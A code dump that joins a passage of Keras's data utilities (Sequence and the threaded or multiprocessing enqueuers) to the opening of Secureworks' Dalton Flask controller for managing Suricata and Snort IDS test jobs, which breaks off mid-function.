`Sequence` is a safer way to do multiprocessing. This structure guarantees
that the network will only train once on each sample per epoch, which is not
the case with generators.
Examples:
```python
from skimage.io import imread
from skimage.transform import resize
import numpy as np
import math
# Here, `x_set` is list of path to the images
# and `y_set` are the associated classes.
class CIFAR10Sequence(Sequence):
def __init__(self, x_set, y_set, batch_size):
self.x, self.y = x_set, y_set
self.batch_size = batch_size
def __len__(self):
return math.ceil(len(self.x) / self.batch_size)
def __getitem__(self, idx):
batch_x = self.x[idx * self.batch_size:(idx + 1) *
self.batch_size]
batch_y = self.y[idx * self.batch_size:(idx + 1) *
self.batch_size]
return np.array([
resize(imread(file_name), (200, 200))
for file_name in batch_x]), np.array(batch_y)
```
"""
@abstractmethod
def __getitem__(self, index):
"""Gets batch at position `index`.
Args:
index: position of the batch in the Sequence.
Returns:
A batch
"""
raise NotImplementedError
@abstractmethod
def __len__(self):
"""Number of batch in the Sequence.
Returns:
The number of batches in the Sequence.
"""
raise NotImplementedError
def on_epoch_end(self):
"""Method called at the end of every epoch.
"""
pass
def __iter__(self):
"""Create a generator that iterate over the Sequence."""
for item in (self[i] for i in range(len(self))):
yield item
def iter_sequence_infinite(seq):
"""Iterates indefinitely over a Sequence.
Args:
seq: `Sequence` instance.
Yields:
Batches of data from the `Sequence`.
"""
while True:
for item in seq:
yield item
# Global variables to be shared across processes
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.
_SEQUENCE_COUNTER = None
# Because multiprocessing pools are inherently unsafe, starting from a clean
# state can be essential to avoiding deadlocks. In order to accomplish this, we
# need to be able to check on the status of Pools that we create.
_DATA_POOLS = weakref.WeakSet()
_WORKER_ID_QUEUE = None # Only created if needed.
_WORKER_IDS = set()
_FORCE_THREADPOOL = False
_FORCE_THREADPOOL_LOCK = threading.RLock()
def dont_use_multiprocessing_pool(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
with _FORCE_THREADPOOL_LOCK:
global _FORCE_THREADPOOL
old_force_threadpool, _FORCE_THREADPOOL = _FORCE_THREADPOOL, True
out = f(*args, **kwargs)
_FORCE_THREADPOOL = old_force_threadpool
return out
return wrapped
def get_pool_class(use_multiprocessing):
global _FORCE_THREADPOOL
if not use_multiprocessing or _FORCE_THREADPOOL:
return multiprocessing.dummy.Pool # ThreadPool
return multiprocessing.Pool
def get_worker_id_queue():
"""Lazily create the queue to track worker ids."""
global _WORKER_ID_QUEUE
if _WORKER_ID_QUEUE is None:
_WORKER_ID_QUEUE = multiprocessing.Queue()
return _WORKER_ID_QUEUE
def init_pool(seqs):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = seqs
def get_index(uid, i):
"""Get the value from the Sequence `uid` at index `i`.
To allow multiple Sequences to be used at the same time, we use `uid` to
get a specific one. A single Sequence would cause the validation to
overwrite the training Sequence.
Args:
uid: int, Sequence identifier
i: index
Returns:
The value at index `i`.
"""
return _SHARED_SEQUENCES[uid][i]
@keras_export('keras.utils.SequenceEnqueuer')
class SequenceEnqueuer:
"""Base class to enqueue inputs.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
Example:
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.stop()
```
The `enqueuer.get()` should be an infinite stream of data.
"""
def __init__(self, sequence,
use_multiprocessing=False):
self.sequence = sequence
self.use_multiprocessing = use_multiprocessing
global _SEQUENCE_COUNTER
if _SEQUENCE_COUNTER is None:
try:
_SEQUENCE_COUNTER = multiprocessing.Value('i', 0)
except OSError:
# In this case the OS does not allow us to use
# multiprocessing. We resort to an int
# for enqueuer indexing.
_SEQUENCE_COUNTER = 0
if isinstance(_SEQUENCE_COUNTER, int):
self.uid = _SEQUENCE_COUNTER
_SEQUENCE_COUNTER += 1
else:
# Doing Multiprocessing.Value += x is not process-safe.
with _SEQUENCE_COUNTER.get_lock():
self.uid = _SEQUENCE_COUNTER.value
_SEQUENCE_COUNTER.value += 1
self.workers = 0
self.executor_fn = None
self.queue = None
self.run_thread = None
self.stop_signal = None
def is_running(self):
return self.stop_signal is not None and not self.stop_signal.is_set()
def start(self, workers=1, max_queue_size=10):
"""Starts the handler's workers.
Args:
workers: Number of workers.
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = self._get_executor_init(workers)
else:
# We do not need the init since it's threads.
self.executor_fn = lambda _: get_pool_class(False)(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
def _send_sequence(self):
"""Sends current Iterable to all workers."""
# For new processes that may spawn
_SHARED_SEQUENCES[self.uid] = self.sequence
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
Args:
timeout: maximum time to wait on `thread.join()`
"""
self.stop_signal.set()
with self.queue.mutex:
self.queue.queue.clear()
self.queue.unfinished_tasks = 0
self.queue.not_full.notify()
self.run_thread.join(timeout)
_SHARED_SEQUENCES[self.uid] = None
def __del__(self):
if self.is_running():
self.stop()
@abstractmethod
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
raise NotImplementedError
@abstractmethod
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
workers: Number of workers.
Returns:
Function, a Function to initialize the pool
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
Tuples `(inputs, targets)` or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
@keras_export('keras.utils.OrderedEnqueuer')
class OrderedEnqueuer(SequenceEnqueuer):
"""Builds a Enqueuer from a Sequence.
Args:
sequence: A `tf.keras.utils.data_utils.Sequence` object.
use_multiprocessing: use multiprocessing if True, otherwise threading
shuffle: whether to shuffle the data at the beginning of each epoch
"""
def __init__(self, sequence, use_multiprocessing=False, shuffle=False):
super(OrderedEnqueuer, self).__init__(sequence, use_multiprocessing)
self.shuffle = shuffle
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
workers: Number of workers.
Returns:
Function, a Function to initialize the pool
"""
def pool_fn(seqs):
pool = get_pool_class(True)(
workers, initializer=init_pool_generator,
initargs=(seqs, None, get_worker_id_queue()))
_DATA_POOLS.add(pool)
return pool
return pool_fn
def _wait_queue(self):
"""Wait for the queue to be empty."""
while True:
time.sleep(0.1)
if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
return
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
while self.is_running():
try:
inputs = self.queue.get(block=True, timeout=5).get()
if self.is_running():
self.queue.task_done()
if inputs is not None:
yield inputs
except queue.Empty:
pass
except Exception as e: # pylint: disable=broad-except
self.stop()
raise e
def init_pool_generator(gens, random_seed=None, id_queue=None):
"""Initializer function for pool workers.
Args:
gens: State which should be made available to worker processes.
random_seed: An optional value with which to seed child processes.
id_queue: A multiprocessing Queue of worker ids. This is used to indicate
that a worker process was created by Keras and can be terminated using
the cleanup_all_keras_forkpools utility.
"""
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = gens
worker_proc = multiprocessing.current_process()
# name isn't used for anything, but setting a more descriptive name is helpful
# when diagnosing orphaned processes.
worker_proc.name = 'Keras_worker_{}'.format(worker_proc.name)
if random_seed is not None:
np.random.seed(random_seed + worker_proc.ident)
if id_queue is not None:
# If a worker dies during init, the pool will just create a replacement.
id_queue.put(worker_proc.ident, block=True, timeout=0.1)
def next_sample(uid):
"""Gets the next value from the generator `uid`.
To allow multiple generators to be used at the same time, we use `uid` to
get a specific one. A single generator would cause the validation to
overwrite the training generator.
Args:
uid: int, generator identifier
Returns:
The next value of generator `uid`.
"""
return next(_SHARED_SEQUENCES[uid])
@keras_export('keras.utils.GeneratorEnqueuer')
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator.
The provided generator can be finite, in which case the class will throw
a `StopIteration` exception.
Args:
generator: a generator function which yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
random_seed: Initial seed for workers,
will be incremented by one for each worker.
"""
def __init__(self, generator,
use_multiprocessing=False,
random_seed=None):
super(GeneratorEnqueuer, self).__init__(generator, use_multiprocessing)
self.random_seed = random_seed
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
workers: Number of workers.
Returns:
A Function to initialize the pool
"""
def pool_fn(seqs):
pool = get_pool_class(True)(
workers, initializer=init_pool_generator,
initargs=(seqs, self.random_seed, get_worker_id_queue()))
_DATA_POOLS.add(pool)
return pool
return pool_fn
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
self._send_sequence() # Share the initial generator
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
while True:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(next_sample, (self.uid,)), block=True)
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except StopIteration:
# Special case for finite generators
last_ones = []
while self.queue.qsize() > 0:
last_ones.append(self.queue.get(block=True))
# Wait for them to complete
for f in last_ones:
f.wait()
# Keep the good ones
last_ones = [future.get() for future in last_ones if future.successful()]
for inputs in last_ones:
if inputs is not None:
yield inputs
except Exception as e: # pylint: disable=broad-except
self.stop()
if 'generator already executing' in str(e):
raise RuntimeError(
'Your generator is NOT thread-safe. '
'Keras requires a thread-safe generator when '
'`use_multiprocessing=False, workers > 1`. ')
raise e
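# Illustrative sketch (not part of the original module): typical OrderedEnqueuer
# usage with a `Sequence` such as the CIFAR10Sequence example above. Names like
# `my_sequence` are hypothetical.
#
#   enqueuer = OrderedEnqueuer(my_sequence, use_multiprocessing=False, shuffle=True)
#   enqueuer.start(workers=2, max_queue_size=10)
#   batches = enqueuer.get()          # generator of batches, in order
#   for _ in range(len(my_sequence)):
#       x_batch, y_batch = next(batches)
#       # ... train on the batch ...
#   enqueuer.stop()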
dalton.py
#!/usr/local/bin/python
"""
Dalton - a UI and management tool for submitting and viewing IDS jobs
"""
# Copyright 2017 Secureworks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# app imports
from flask import Blueprint, render_template, request, Response, redirect, url_for
#from flask_login import current_user
import hashlib
import os
import glob
import re
import redis
import datetime
import time
import json
import zipfile
import tarfile
import gzip
import bz2
import sys
import shutil
from distutils.version import LooseVersion
import ConfigParser
import logging
from logging.handlers import RotatingFileHandler
import subprocess
from ruamel import yaml
import base64
import cStringIO
import traceback
import random
from threading import Thread
import tempfile
# setup the dalton blueprint
dalton_blueprint = Blueprint('dalton_blueprint', __name__, template_folder='templates/dalton/')
# logging
file_handler = RotatingFileHandler('/var/log/dalton.log', 'a', 1 * 1024 * 1024, 10)
file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s'))
logger = logging.getLogger("dalton")
logger.addHandler(file_handler)
logger.setLevel(logging.INFO)
logger.info("Logging started")
try:
dalton_config_filename = 'dalton.conf'
dalton_config = ConfigParser.SafeConfigParser()
dalton_config.read(dalton_config_filename)
# user-configurable variables; see comments in dalton.conf for details.
TEMP_STORAGE_PATH = dalton_config.get('dalton', 'temp_path')
VARIABLES_STORAGE_PATH = dalton_config.get('dalton', 'var_path')
RULESET_STORAGE_PATH = dalton_config.get('dalton', 'ruleset_path')
JOB_STORAGE_PATH = dalton_config.get('dalton', 'job_path')
CONF_STORAGE_PATH = dalton_config.get('dalton', 'engine_conf_path')
REDIS_EXPIRE = (dalton_config.getint('dalton', 'redis_expire') * 60)
TEAPOT_REDIS_EXPIRE = (dalton_config.getint('dalton', 'teapot_redis_expire') * 60)
JOB_RUN_TIMEOUT = dalton_config.getint('dalton', 'job_run_timeout')
AGENT_PURGE_TIME = dalton_config.getint('dalton', 'agent_purge_time')
REDIS_HOST = dalton_config.get('dalton', 'redis_host')
API_KEYS = dalton_config.get('dalton', 'api_keys')
MERGECAP_BINARY = dalton_config.get('dalton', 'mergecap_binary')
U2_ANALYZER = dalton_config.get('dalton', 'u2_analyzer')
RULECAT_SCRIPT = dalton_config.get('dalton', 'rulecat_script')
MAX_PCAP_FILES = dalton_config.getint('dalton', 'max_pcap_files')
DEBUG = dalton_config.getboolean('dalton', 'debug')
#options for flowsynth
FS_BIN_PATH = dalton_config.get('flowsynth-web', 'bin_path') #Path to the flowsynth application
FS_PCAP_PATH = dalton_config.get('flowsynth-web', 'pcap_path') #Path to temporarily store PCAPs
except Exception as e:
logger.critical("Problem parsing config file '%s': %s" % (dalton_config_filename, e))
if DEBUG or ("CONTROLLER_DEBUG" in os.environ and int(os.getenv("CONTROLLER_DEBUG"))):
logger.setLevel(logging.DEBUG)
logger.debug("DEBUG logging enabled")
if not MERGECAP_BINARY or not os.path.exists(MERGECAP_BINARY):
logger.error("mergecap binary '%s' not found. Suricata jobs cannot contain more than one pcap." % MERGECAP_BINARY)
MERGECAP_BINARY = None
if not os.path.exists(U2_ANALYZER):
logger.error("U2 Analyzer '%s' not found. Cannot process alert details." % U2_ANALYZER)
U2_ANALYZER = None
elif U2_ANALYZER.endswith(".py"):
# assumes 'python' binary in path
U2_ANALYZER = "%s %s" % ("python", U2_ANALYZER)
else:
logger.error("U2 Analyzer '%s' does not end in .py. Cannot process alert details." % U2_ANALYZER)
#connect to the datastore
try:
r = redis.Redis(REDIS_HOST)
except Exception as e:
logger.critical("Problem connecting to Redis host '%s': %s" % (REDIS_HOST, e))
# if there are no rules, use idstools rulecat to download a set for Suri and Snort
# if rulecat fails (eaten by proxy), empty rules file(s) may be created
if os.path.exists(RULECAT_SCRIPT):
for engine in ['suricata', 'snort']:
ruleset_dir = os.path.join(RULESET_STORAGE_PATH, engine)
rules = [f for f in os.listdir(ruleset_dir) if (os.path.isfile(os.path.join(ruleset_dir, f)) and f.endswith(".rules"))]
if len(rules) == 0:
filename = "ET-%s-all-%s.rules" % (datetime.datetime.utcnow().strftime("%Y%m%d"), engine)
logger.info("No rulesets for %s found. Downloading the latest ET set as '%s'" % (engine, filename))
if engine == "suricata":
url = "https://rules.emergingthreats.net/open/suricata-1.3/emerging.rules.tar.gz"
if engine == "snort":
url = "https://rules.emergingthreats.net/open/snort-2.9.0/emerging.rules.tar.gz"
command = "python %s --url %s --merged %s" % (RULECAT_SCRIPT, url, os.path.join(ruleset_dir, filename))
try:
subprocess.call(command, stdin=None, stdout=None, stderr=None, shell=True)
except Exception as e:
logger.info("Unable to download ruleset for %s" % engine)
logger.debug("Exception: %s" % e)
# check for sane timeout values
if REDIS_EXPIRE <= 0:
logger.critical("redis_expire value of %d minutes is invalid. Expect problems." % dalton_config.getint('dalton', 'redis_expire'))
if TEAPOT_REDIS_EXPIRE <= 0:
logger.critical("teapot_redis_expire value of %d minutes is invalid. Expect problems." % dalton_config.getint('dalton', 'teapot_redis_expire'))
if AGENT_PURGE_TIME <= 1:
logger.critical("agent_purge_time value of %d seconds is invalid. Expect problems." % AGENT_PURGE_TIME)
if JOB_RUN_TIMEOUT <= 4:
logger.critical("job_run_time value of %d seconds is invalid. Expect problems." % JOB_RUN_TIMEOUT)
if TEAPOT_REDIS_EXPIRE > REDIS_EXPIRE:
logger.warn("teapot_redis_expire value %d greater than redis_expire value %d. This is not recommended and may result in teapot jobs being deleted from disk before they expire in Redis." % (TEAPOT_REDIS_EXPIRE, REDIS_EXPIRE))
# other checks
if MAX_PCAP_FILES < 1:
default_max = 8
logger.warn("max_pcap_files value of '%d' invalid. Using '%d'" % (MAX_PCAP_FILES, default_max))
MAX_PCAP_FILES = default_max
sensor_tech_re = re.compile(r"^[a-zA-Z0-9\x2D\x2E\x5F]+$")
#global values used by Flask
TRAP_BAD_REQUEST_KEY_ERRORS = True
#status codes
STAT_CODE_INVALID = -1
STAT_CODE_QUEUED = 0
STAT_CODE_RUNNING = 1
STAT_CODE_DONE = 2
STAT_CODE_INTERRUPTED = 3
STAT_CODE_TIMEOUT = 4
# engine technologies supported; used for validation (sometimes)
supported_engines = ['suricata', 'snort']
logger.info("Dalton Started.")
def delete_temp_files(job_id):
""" deletes temp files for given job ID"""
global TEMP_STORAGE_PATH
if os.path.exists(TEMP_STORAGE_PATH):
for file in glob.glob(os.path.join(TEMP_STORAGE_PATH, "%s*" % job_id)):
if os.path.isfile(file):
os.unlink(file)
if os.path.exists(os.path.join(TEMP_STORAGE_PATH, job_id)):
shutil.rmtree(os.path.join(TEMP_STORAGE_PATH, job_id))
def verify_temp_storage_path():
"""verify and create if necessary the temp location where we will store files (PCAPs, configs, etc.)
when build a job zip file
"""
global TEMP_STORAGE_PATH
if not os.path.exists(TEMP_STORAGE_PATH):
os.makedirs(TEMP_STORAGE_PATH)
return True
@dalton_blueprint.route('/dalton/controller_api/get-prod-rulesets/<engine>', methods=['GET'])
def api_get_prod_rulesets(engine):
global supported_engines
if engine is None or engine == '' or engine not in supported_engines:
return Response("Invalid 'engine' supplied. Must be one of %s.\nExample URI:\n\n/dalton/controller_api/get-prod-rulesets/suricata" % supported_engines,
status=400, mimetype='text/plain', headers = {'X-Dalton-Webapp':'OK'})
# return json
ruleset_list = []
# this is a 2D array with filename and full path for each rules file
# but this function only returns a 1D array with full paths
current_rulesets = get_rulesets(engine)
for ruleset in current_rulesets:
if len(ruleset) > 1:
ruleset_list.append(ruleset[1])
json_response = {'prod-rulesets': ruleset_list}
return Response(json.dumps(json_response), status=200, mimetype='application/json', headers = {'X-Dalton-Webapp':'OK'})
def get_rulesets(engine=''):
""" return a list of locally stored ruleset for jobs to use """
global RULESET_STORAGE_PATH
ruleset_list = []
logger.debug("in get_rulesets(engine=%s)" % engine)
# engine var should already be validated but just in case
if not re.match(r"^[a-zA-Z0-9\_\-\.]*$", engine):
logger.error("Invalid engine value '%s' in get_rulesets()" % engine)
return ruleset_list
ruleset_dir = os.path.join(RULESET_STORAGE_PATH, engine)
if not os.path.isdir(ruleset_dir):
logger.error("Could not find ruleset directory '%s'" % ruleset_dir)
return ruleset_list
file_list = os.listdir(ruleset_dir)
# do we want to descend into directories?
for file in file_list:
if not os.path.isfile(os.path.join(ruleset_dir, file)):
continue
if os.path.splitext(file)[1] == '.rules':
# just add file (base) for now so we can sort; build 2D list on return
ruleset_list.append(os.path.basename(file))
#sort
ruleset_list.sort(reverse=True)
# return 2D array with base and full path
return [[file, os.path.join(ruleset_dir, file)] for file in ruleset_list]
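# Illustrative sketch (not part of the original file): get_rulesets() returns a
# 2D list of [basename, full path] pairs, so callers can unpack both, e.g.:
#
#   for name, full_path in get_rulesets('suricata'):
#       logger.debug("ruleset %s -> %s" % (name, full_path))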
def set_job_status_msg(jobid, msg):
"""set a job's status message """
global r
r.set("%s-status" % jobid, msg)
# status keys do not expire if/when they are queued
if msg != "Queued":
if r.get("%s-teapotjob" % jobid):
r.expire("%s-status" % jobid, TEAPOT_REDIS_EXPIRE)
else:
r.expire("%s-status" % jobid, REDIS_EXPIRE)
def get_job_status_msg(jobid):
"""returns a job's status message"""
global r
return r.get("%s-status" % jobid)
def set_job_status(jobid, status):
"""set's a job status code"""
global r
r.set("%s-statcode" % jobid, status)
# statcode keys do not expire if/when they are queued
if status != STAT_CODE_QUEUED:
if r.get("%s-teapotjob" % jobid):
r.expire("%s-statcode" % jobid, TEAPOT_REDIS_EXPIRE)
else:
r.expire("%s-statcode" % jobid, REDIS_EXPIRE)
def get_job_status(jobid):
"""return a job's status code"""
global r
return r.get("%s-statcode" % jobid)
def set_keys_timeout(jobid):
"""set timeout of REDIS_EXPIRE seconds on keys that (should) be set when job results are posted"""
EXPIRE_VALUE = REDIS_EXPIRE
if r.get("%s-teapotjob" % jobid):
EXPIRE_VALUE = TEAPOT_REDIS_EXPIRE
try:
r.expire("%s-ids" % jobid, EXPIRE_VALUE)
r.expire("%s-perf" % jobid, EXPIRE_VALUE)
r.expire("%s-alert" % jobid, EXPIRE_VALUE)
r.expire("%s-error" % jobid, EXPIRE_VALUE)
r.expire("%s-debug" % jobid, EXPIRE_VALUE)
r.expire("%s-time" % jobid, EXPIRE_VALUE)
r.expire("%s-alert_detailed" % jobid, EXPIRE_VALUE)
r.expire("%s-other_logs" % jobid, EXPIRE_VALUE)
r.expire("%s-teapotjob" % jobid, EXPIRE_VALUE)
except:
pass
def expire_all_keys(jid):
"""expires (deletes) all keys for a give job ID"""
# using the redis keys function ('r.keys("%s-*" % jid)') searches thru all keys which is not
# efficient for large key sets so we are deleting each one individually
global r
logger.debug("Dalton calling expire_all_keys() on job %s" % jid)
keys_to_delete = ["ids", "perf", "alert", "alert_detailed", "other_logs", "error", "debug", "time", "statcode", "status", "start_time", "user", "tech", "submission_time", "teapotjob"]
try:
for cur_key in keys_to_delete:
r.delete("%s-%s" % (jid, cur_key))
except:
pass
def check_for_timeout(jobid):
"""checks to see if a job has been running more than JOB_RUN_TIMEOUT seconds and sets it to STAT_CODE_TIMEOUT and sets keys to expire"""
global r
try:
start_time = int(r.get("%s-start_time" % jobid))
except:
start_time = int(time.time()) - (JOB_RUN_TIMEOUT + 1)
#logger.debug("Dalton in check_for_timeout(): job %s start time: %d" % (jobid, start_time))
if not start_time or ((int(time.time()) - start_time) > JOB_RUN_TIMEOUT):
if int(get_job_status(jobid)) == STAT_CODE_RUNNING:
logger.info("Dalton in check_for_timeout(): job %s timed out. Start time: %d, now: %d" % (jobid, start_time, int(time.time())))
set_job_status(jobid, STAT_CODE_TIMEOUT)
set_job_status_msg(jobid, "Job %s has timed out, please try submitting the job again." % jobid)
set_keys_timeout(jobid)
return True
else:
return False
else:
return False
@dalton_blueprint.route('/dalton/controller_api/delete-old-job-files', methods=['GET'])
def delete_old_job_files():
"""Deletes job files on disk if modificaiton time exceeds expire time(s)"""
global REDIS_EXPIRE, TEAPOT_REDIS_EXPIRE, JOB_STORAGE_PATH, logger
total_deleted = 0
# this is coded but not enabled since there isn't any authentication and I don't think
# anyone should be able to delete jobs older than an arbitrary number of minutes
if request:
mmin = request.args.get('mmin')
teapot_mmin = request.args.get('teapot_mmin')
if mmin is not None:
logger.warn("Passing a mmin value to delete_old_job_files() is currently not enabled. Using %d seconds for regular jobs." % REDIS_EXPIRE)
if teapot_mmin is not None:
logger.warn("Passing a teapot_mmin value to delete_old_job_files() is currently not enabled. Using %d seconds for teapot jobs." % TEAPOT_REDIS_EXPIRE)
# these values are in seconds (the config values are specified in minutes and converted at load)
job_mmin = REDIS_EXPIRE
teapot_mmin = TEAPOT_REDIS_EXPIRE
if os.path.exists(JOB_STORAGE_PATH):
now = time.time()
# assumption is REDIS_EXPIRE >= TEAPOT_REDIS_EXPIRE
for file in glob.glob(os.path.join(JOB_STORAGE_PATH, "*.zip")):
if os.path.isfile(file):
mtime = os.path.getmtime(file)
if (now-mtime) > REDIS_EXPIRE:
logger.debug("Deleting job file '%s'. mtime %s; now %s; diff %d seconds; expire threshold %d seconds" % (os.path.basename(file), now, mtime, (now-mtime), REDIS_EXPIRE))
os.unlink(file)
total_deleted += 1
for file in glob.glob(os.path.join(JOB_STORAGE_PATH, "teapot_*.zip")):
if os.path.isfile(file):
mtime = os.path.getmtime(file)
if (now-mtime) > TEAPOT_REDIS_EXPIRE:
logger.debug("Deleting teapot job file '%s'. mtime %s; now %s; diff %d seconds; expire threshold %d seconds" % (os.path.basename(file), now, mtime, (now-mtime), TEAPOT_REDIS_EXPIRE))
os.unlink(file)
total_deleted += 1
if total_deleted > 0:
logger.info("Deleted %d job file(s) from disk." % total_deleted)
# returning a string so Flask can render it; calling functions that use the
# return value need to cast it back to int if they wish to use it as an int
return str(total_deleted)
@dalton_blueprint.route('/')
def index():
return redirect('/dalton/')
@dalton_blueprint.route('/dalton')
@dalton_blueprint.route('/dalton/')
#@login_required()
def page_index():
"""the default homepage for Dalton"""
return render_template('/dalton/index.html', page='')
# this is technically 'controller_api' but supporting 'sensor_api' since
# previous versions had that
@dalton_blueprint.route('/dalton/sensor_api/request_engine_conf/<sensor>', methods=['GET'])
@dalton_blueprint.route('/dalton/controller_api/request_engine_conf/<sensor>', methods=['GET'])
#@auth_required()
def api_get_engine_conf_file(sensor):
global supported_engines
if sensor is None:
return Response("Invalid 'sensor' supplied.",
status=400, mimetype='text/plain', headers = {'X-Dalton-Webapp':'OK'})
return Response(json.dumps(get_engine_conf_file(sensor)), status=200, mimetype='application/json', headers = {'X-Dalton-Webapp':'OK'})
def get_engine_conf_file(sensor):
""" return the corresponding configuration file for passed in sensor (engine and version)
also returns the variables (stripped out from config)
"""
# user's browser should be making request to dynamically update 'coverage' submission page
try:
conf_file = None
vars_file = None
(engine, version) = sensor.split('-', 1)
epath = os.path.join(CONF_STORAGE_PATH, engine)
filelist = [f for f in os.listdir(epath) if os.path.isfile(os.path.join(epath, f))]
# assumes an extension (e.g. '.yaml', '.conf') on engine config files
files = [f for f in filelist if LooseVersion(os.path.splitext(f)[0]) <= LooseVersion(sensor)]
if len(files) > 0:
files.sort(key=lambda v:LooseVersion(os.path.splitext(v)[0]), reverse=True)
conf_file = os.path.join(epath, files[0])
logger.debug("in get_engine_conf_file: passed sensor value: '%s', conf file used: '%s'" % (sensor, os.path.basename(conf_file)))
engine_config = ''
variables = ''
if conf_file:
# open, read, return
# Unix newline is \n but for display on web page, \r\n is desired in some
# browsers/OSes. Note: currently not converted back on job submit.
fh = open(conf_file, 'rb')
if engine.lower().startswith('suri'):
# need the read() method to load the yaml
contents = fh.read()
else:
# want to parse each line so put it in to a list
contents = fh.readlines()
fh.close()
# extract out variables
if engine.lower().startswith('snort'):
ignore_vars = ("RULE_PATH", "SO_RULE_PATH", "PREPROC_RULE_PATH", "WHITE_LIST_PATH", "BLACK_LIST_PATH")
lines = iter(contents)
while True:
try:
line = next(lines).rstrip('\r\n')
if not (line.startswith("var ") or line.startswith("portvar ") or line.startswith("ipvar ")):
engine_config += "%s\r\n" % line
# comment out (other) rule includes .. actually I don't want to do this here.
# The engine config file is the place to do this.
#if line.startswith("include ") and line.endswith(".rules"):
# engine_config += "#%s\r\n" % line
#else:
# engine_config += "%s\r\n" % line
else:
if line.startswith("var ") and len([x for x in ignore_vars if x in line]) > 0:
engine_config += "%s\r\n" % line
else:
variables += "%s\r\n" % line
except StopIteration:
break
elif engine.lower().startswith('suri'):
# read in yaml with ruamel python lib, extract out vars
# doing it like this adds a little load time but preserves
# comments (for the most part). Can't use ruamel >= 0.15.x
# b/c it won't preserve the inputted YAML 1.1 on dump (e.g.
# quoted sexagesimals, unquoted 'yes', 'no', etc.).
logger.debug("Loading YAML for %s" % conf_file)
# so apparently the default Suri config has what are interpreted
# as (unquoted) booleans and it uses yes/no. But if you change from
# yes/no to true/false, Suri will throw an error when parsing the YAML
# even though true/false are valid boolean values for YAML 1.1. ruamel.yaml
# will normalize unquoted booleans to true/false so quoting them here to
# preserve the yes/no. This is also done on submission.
contents = re.sub(r'(\w):\x20+(yes|no)([\x20\x0D\x0A\x23])', '\g<1>: "\g<2>"\g<3>', contents)
# suri uses YAML 1.1
config = yaml.round_trip_load(contents, version=(1,1), preserve_quotes=True)
# usually I try not to mess with the config here since the user should set
# desired defaults in the yaml on disk. But if the logging level is 'notice',
# that is next to useless and setting it to 'info' won't hurt anything and will
# provide some useful info such as number of rules loaded.
if "logging" in config and "default-log-level" in config['logging'] and config['logging']['default-log-level'] == "notice":
config['logging']['default-log-level'] = "info"
# pull out vars and dump
variables = yaml.round_trip_dump({'vars': config.pop('vars', None)})
# (depending on how you do it) the YAML version gets added back
# in when YAML of just vars is dumped.
# This data (variables) is concatenated with the rest of the config and there
# can't be multiple version directives. So just in case, strip it out.
if variables.startswith("%YAML 1.1\n---\n"):
variables = variables[14:]
# dump engine_config
engine_config = yaml.round_trip_dump(config, version=(1,1), explicit_start=True)
else:
engine_config = '\r\n'.join([x.rstrip('\r\n') for x in contents])
variables = ''
else:
logger.warn("No suitable configuration file found for sensor '%s'." % sensor)
engine_config = "# No suitable configuration file found for sensor '%s'." % sensor
variables = "# No variables in config for sensor '%s'." % sensor
results = {'conf': engine_config, 'variables': variables}
return json.dumps(results)
except Exception as e:
logger.error("Problem getting configuration file for sensor '%s'. Error: %s\n%s" % (sensor, e, traceback.format_exc()))
engine_config = "# Exception getting configuration file for sensor '%s'." % sensor
variables = engine_config
results = {'conf': engine_config, 'variables': variables}
return json.dumps(results)
@dalton_blueprint.route('/dalton/sensor_api/update/', methods=['POST'])
#@auth_required('write')
# status update from Dalton Agent
def sensor_update():
""" a sensor has submitted an api update"""
global r
global STAT_CODE_DONE
uid = request.form.get('uid')
msg = request.form.get('msg')
job = request.form.get('job')
